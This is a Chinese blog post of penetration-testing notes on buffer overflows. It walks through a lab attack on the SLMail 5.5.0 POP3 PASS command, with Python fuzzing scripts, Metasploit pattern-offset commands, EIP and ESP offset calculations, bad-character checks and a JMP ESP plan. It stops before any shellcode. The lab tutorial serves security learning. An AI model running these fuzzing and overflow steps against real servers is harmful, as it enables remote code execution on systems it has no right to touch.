【渗透测试笔记】之【缓冲区溢出】

最新推荐文章于 2023-01-17 19:33:42 发布
最新推荐文章于 2023-01-17 19:33:42 发布
阅读量2.9k 收藏 8
点赞数 2
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/106460107
版权

程序漏洞从哪里来?

  • 罪恶的根源:变量
  • 数据与代码边界不清
  • 最简漏洞原理——shell脚本漏洞

缓冲区溢出

  • 缓冲区是内存的一个片段
  • 当缓冲区边界不严格时,由于变量传入畸形数据或程序,导致缓冲区撑破,从而覆盖了相邻内存数据
  • 可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权等后果

如何发现?

  • 代码审计
  • 逆向工程
  • 模糊测试
  1. 向程序堆栈半随机的数据、根据内存变化判断溢出
  2. 数据生成器:生成随机、半随机数据
  3. 测试工具:识别溢出漏洞

对SLMail 5.5.0 Mail Sever POP3服务的缓冲区溢出实验

实验环境准备

靶机:WindowsXP
攻击机:Kali

实验工具:

  • SLMail 5.5.0 Mail Sever(pop3输入PASS的时候存在缓冲区溢出漏洞)
  • OllyDbg(动态调试工具)

1.安装SLMail 5.5.0 Mail Sever

下载地址:https://slmail.software.informer.com/download/
打开安装程序后依次点击:

Next->Next->Next->(记住IP地址)Next->(选择刚刚的IP地址)Next->Next->(输入一个域名,如:test.com)Next->(DNS输入192.168.1.1)Next->(NO)Next->Next->Next->Next->(点击Modify,点击Administrator)Next->Next->Next->Next->Next->(勾选Allow NT User Import)Next->下一步->(点击主机名)下一步->(将Administrator和主机名add到右边)下一步->下一步(No)->完成->Finish

查看服务是否启动:
在这里插入图片描述
输入services.msc查看服务:
在这里插入图片描述
关闭防火墙,否则不能连接pop3服务(开启对应端口也行)。
在这里插入图片描述

实验过程

确认靶机pop3服务正常连接

使用nc连接靶机的110端口,并任意测试USER test,PASS test,发现不能登录,说明靶机POP3服务已经可以使用。
在这里插入图片描述

模糊测试

使用python脚本进行模糊测试,测试变量PASS 接受大量数据时时候会溢出。
首先在靶机打开OllyDbg,Attach SLmail进程:
在这里插入图片描述
在这里插入图片描述
点击run,让程序正常运行:
在这里插入图片描述
注意此时的EIP寄存器为:7C92120F,这是ASCII码的十六进制。(因为EIP寄存器的值代表着计算机要执行的下一步指令的内存地址,所以最终目的是要让字符溢出到EIP寄存器,并且知道这4个字节在溢出字符中的位置。)

在这里插入图片描述
为了方便测试,用Python写一个模糊测试脚本。
fuzzy1.py:

#!/usr/bin/python3
#coding=UTF-8
import socket

buffer=["A"]
counter=100
while len(buffer) <= 50:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print("Fuzzing PASS with %s bytes" % len(string))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.2.104',110))
    s.recv(1024)
    send='USER test\r\n'.encode('utf-8')
    s.send(send)
    s.recv(1024)
    send='PASS ' + string + '\r\n'
    s.send(send.encode('utf-8'))
    s.send('QUIT\r\n'.encode('utf-8'))
    s.close()

给脚本添加可执行权限并运行,开始对靶机进行模糊测试:
在这里插入图片描述
可以看见当密码达到2900个字节的时候卡住了,此时回到靶机上面的DO,发现EIP寄存器已经被填充为了41414141,这里的41即为字母A的ASCII码的是十六进制。所以此时已经发生了缓冲区溢出,且溢出字符小于2900bytes。
在这里插入图片描述

精确寻找溢出位置

此时靶机的pop3服务已经崩溃了,services.msc找到pop3服务右键重新j将其启动,利用OllyDbg再次Attach SLmail,并运行。

在攻击机上生成一个长度为2900字节的唯一字符串,这样再次发生溢出的时候,查看EIP被占用的字符串即可精确定位溢出字符的位置。

  • 生成长度为2900字节的唯一字符串方式(利用MSF的工具):
cd /usr/share/metasploit-framework/tools/exploit
./pattern_create.rb -l 2900

在这里插入图片描述
利用fuzzy2.py脚本将唯一字符串发送给靶机:
在这里插入图片描述
fuzzy2.py:

#!/usr/bin/python3
#coding=UTF-8
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 唯一字符串
string="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds"  
try:
    print ("\nSending evil string...")
    s.connect(('192.168.2.104',110))
    s.recv(1024)
    send='USER test\r\n'.encode('utf-8')
    s.send(send)
    s.recv(1024)
    send='PASS ' + string + '\r\n'
    s.send(send.encode('utf-8'))
    print ("\nDone!")
except:
    print ("Could not connect to POP3!")

此时回到靶机,可以发现EIP寄存器被填入了的四个ASC编码:39694438
在这里插入图片描述

利用MSF工具定位这四个字符的位置:

cd /usr/share/metasploit-framework/tools/exploit
./pattern_offset.rb -q 39694438

在这里插入图片描述
显示结果为2606,表示这个字符串之前有2006个字符,所以溢出的字符是从第2607个字节开始的,即2607、2608、2609和2610。

计算ESP可存放shellcode的内存空间

右键ESP的内存地址,点击Follow in Dump:
在这里插入图片描述
可以看到存放了唯一字符串的ESP地址,定位最后四个字符,并记下其对应十六进制数:73354473。将其倒序(存在存读机制):73443573
在这里插入图片描述

利用MSF工具定位这四个字符的位置:

cd /usr/share/metasploit-framework/tools/exploit
./pattern_offset.rb -q 73443573

在这里插入图片描述
发现其之前有2896个字节,加上最后4个字节,再除去EBP和EIP所占的2610个字节,那么ESP的可利用内存有290个字节。

找出了ESP的可利用空间,那么这些空间可以用于存放ShellCode。注意,一些字符不能存入内存。 不同类型的程序、协议、漏洞,会将某些字符认为是坏字符,坏字符通常会截断后面的字符。如:

  • null byte(0x00)空字符,用于终止字符串拷贝的操作
  • return (0x0D)回车操作,表示POP3 PASS命令输入完成

解决方法:发送0x00-0xff共256个字符,逐个删除截断了后面的字符,从而判断哪些字符不可用。

后续思路

由于计算机每次开机ESP 的地址都不一样,所以无法通过将EIP 的内容改为ESP的地址从而执行ShellCode。

采取的方法是在内存中寻找一个内存地址固定不变的系统模块,然后在此模块中寻找一个JMP ESP 即跳向ESP的指令的地址(并且此内存地址无DEP,ALSR内存保护机制)。

将EIP的地址指向上述地址。

从而可以达到每次开机EIP 都会间接跳转到ESP 上执行ShellCode。

AA8j
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
slmail 5.5.0
03-12
SLMail 5.5.0 的POP3服务、110端口存在缓冲区溢出漏洞,通过构造PASS字段,可以造成RCE攻击。 参考文章:https://blog.csdn.net/weixin_44180446/article/details/104800646
Windows系统安全之SLMail缓冲区溢出漏洞复现
Hvnt3r的博客
03-06 2283
原文链接 在我大二时任技术交流协会信安部部长时我曾给学弟学妹们介绍过这个关于SLMail的缓冲区溢出漏洞,给他们讲的原因是想扩展一下他们的知识面,现在我再重新温习一下这个漏洞来跟现阶段学习的Linux缓冲区漏洞做一个对比 环境搭建 首先需要搭建实验环境,系统可选用Windows_XP,因为Windows7及以上的系统内置了多种安全措施使得此漏洞难以利用,本实验用到的软件及下载链接如下: SLMa...
Windows缓冲区溢出初探
Amire0x的小乐园
11-07 979
# 实验环境 kali Windows xp xp3 SLMail 5.5.0 Mail Server ImmunityDebugger_1_85_setup.exe mona.py 流程 准备 在拥有以上环境后,逐个安装,安装结束后 确认端口是否开放 检查邮件相关服务 将mona放入Immunity Debugger的根目录中的Pycommands中 在kali上ping一下邮件服务器 用nc连接一下端口,没问题 大体思路 对于未知协议 查相关RFC:有数据输入的部分 Wireshark:抓包 就
渗透测试-----4-缓冲区溢出
weixin_62693307的博客
01-17 788
然而,如果攻击者能够进入缓冲区的空间,那么“longjmp(buffer)”实际上是跳转到攻击者的代码。一个典型的例子就是Pe。通过改变程序的返回地址,当函数调用结束时,程序就跳转到攻击者设定的地址,而不是原先的地址。有时,攻击者想要的代码已经在被攻击的程序中了,攻击者所要做的只是对代码传递一些参数。比如,攻击代码要求执行“exec(“/bin/sh”)”,而在libc库中的代码执行“exec(arg)”,其中arg使一个指向一个字符串的指针参数,那么攻击者只要把传入的参数指针改向指向”/bin/sh”。
SLMail缓冲区溢出攻击模糊测试过程
HRBEU
07-01 1438
作者:MISS WU 缓冲区溢出原理: http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html 需要工具下载地址: https://pan.baidu.com/s/1OoOQ5GoYZ4lxNsapJVPuhA 一、准备 环境:Windows xp【系统缓冲区溢出,多是其服务】 靶机:winXP【不建...
Micro8渗透笔记.zip
08-17
这个阶段可能涉及到SQL注入、命令注入、缓冲区溢出等多种技术。 四、权限提升 一旦进入系统,权限提升成为关键。通过获取更高的权限,测试者可以访问更多的资源,进行更深入的分析。这可能包括利用本地提权漏洞、...
eLearnSecurity 漏洞利用开发学生笔记(作者:Joas).pdf
最新发布
10-06
攻击者通常通过向程序传递过长的输入,使缓冲区溢出,从而覆盖函数返回地址,达到执行任意代码的目的。 "Abusing EIP Control"章节进一步解释了如何在Windows系统中利用这种方法控制EIP(指令指针寄存器),以执行...
asp提权笔记大全,渗透中遇到的各种问题
12-26
8. **缓冲区溢出**:虽然在现代环境中较少出现,但某些旧版ASP组件可能存在缓冲区溢出漏洞,攻击者可以利用此漏洞执行任意代码。 9. **利用系统函数**:ASP中的一些内置函数,如`Server.CreateObject`,可能被用来...
PenetrationProject:一切我的笔下笔记
03-07
Sudo缓冲区溢出 挑战 基本的 TryHackMe 一体 Anonforce_Check_20210117 Basic_Pentesting_Check_20210117 蓝色 螺栓 布鲁克林九九 蛮力 ChocolateFactory CtfCollectionVol1 达夫 FowSniff1 入门指南 LFI_...
OSCE-Exploit-Development
04-24
1. **源代码文件**:可能是.py文件,包含了各种漏洞利用的实现,可能涵盖缓冲区溢出、格式字符串漏洞、堆溢出等经典漏洞利用技术。 2. **教程文档**:可能是.md或.pdf文件,提供了关于如何理解和开发exploit的详细...
ImmunityDebugger_1_85_setup
04-30
ImmunityDebugger+mona,漏洞利用神器!!!
exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
Nixawk
07-26 3256
https://www.exploit-db.com/exploits/638/#!/usr/bin/python # -*- encoding: utf-8 -*-import sys import socket import struct# # OS Name: Microsoft Windows XP Professional # OS Version:
Kali渗透测试:对软件的溢出漏洞进行测试
Liu_Bruce的博客
05-20 736
Kali渗透测试:对软件的溢出漏洞进行测试 如何对一个软件进行渗透渗透目标是FreeFloat FTP Server, 这是一款十分简单的FTP服务器软件。FreeFloat FTP Server会在运行的主机上建立一个FTP服务器,其他计算机上的用户可以登录这个FTP服务器来存取文件。如我们在IP地址为192.168.68.160的主机的C盘中运行FreeFloat FTP Server,在另一台计算机中可以使用FTP下载工具或者命令的方式对其进行访问。这里我们采用命令的方式对其进行访问,如下图所示:
slmail--缓冲区溢出
weixin_45018333的博客
04-23 1538
实验环境:WindowsXP-Pro-sp2 准备:immunity-debugger-1.85;mona-master;slmail5.5 链接:https://pan.baidu.com/s/1BJQGOZnqPtdRbxv2I8Z2OA 提取码:bfot 备注: 里面有一个XP激活工具,在安全模式下使用,我遇到了这个问题,就放到里面了。 为什么用XP?其他更高版本会有防护机制,偏离了缓冲区溢出的初衷,这里就做个简化。 immunity-debugger-1.85;smail5.5分别无脑安装 mona
修改SLmail邮件服务器IP地址
李安北的博客
04-19 513
安装SLMail 5.5.0 Mail Server我选择得IP地址是169.254.153.57 后来我更新了IP地址,不在适配 所以要更改成本地IP地址 首先打开注册表编辑 点击运行输入“regedit” 按如图搜索 右键修改 修改完成后,先关机重启 查看是否修改成功 netstat -ano ok 修改成功 ...
Windows缓冲区溢出之SLMail
Mi1k7ea
07-08 6025
基本概念与环境准备缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server程序的POP3 PASS命令存在缓冲区溢出漏洞,无需身份验证实现远程代码执行。注意,Win7以上系...
kali——缓冲区溢出
h0ryit的博客
05-25 1716
缓冲区溢出缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被”撑爆”,从而覆盖了相邻内存区域的数据; 成功修改内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果 如何发现漏洞 源码审计 逆向工程 模糊测试 向程序堆找半随机的数据,根据内存变化判断溢出 数据生成器:生成随机,半随机数据 测试工具:识别溢出漏洞 windows缓冲区溢出 ...
安全测试缓冲区溢出(BO)
小太阳~
02-02 3667
一、缓冲区溢出的概念BO的概念很简单,就是你申请了一点内存,而你填入的数据超过了内容的大小,这样你填入的数据就会占用其他的内容,这种情况就是缓冲区溢出。void copy(char* info) { char buf[100]; strcpy(buf, info); }如果info的长度大于100,就会产生buffer overflow了。二、怎样利用BO来实施攻击?BO听起来只是会占用其他的内存,
eLearnSecurity eWPT Notes.pdf
10-06
网络安全渗透测试

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值